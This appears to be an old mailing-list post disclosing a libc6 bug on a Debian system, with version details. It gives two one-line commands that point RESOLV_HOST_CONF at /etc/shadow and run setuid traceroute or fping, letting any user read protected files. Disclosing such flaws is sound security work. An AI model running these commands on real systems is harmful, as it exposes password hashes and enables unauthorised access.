libc6 vulnerability
Folks:
When checking the security of my system, I found that it is vulnerable
to the following standard attack (in tcsh syntax):
env RESOLV_HOST_CONF=/etc/shadow /usr/sbin/traceroute foobar
or env RESOLV_HOST_CONF=/etc/shadow fping foobar
This allows the user to read any (text) file on the system. My system
has:
netstd 3.07-7.1
libc6 2.0.105-1.2
In other words, it is up to date according to ftp.debian.org.
Curiously, my older 486 system at home is not vulnerable to these attacks.
--Paul Vojta, vojta@math.berkeley.edu
Reply to: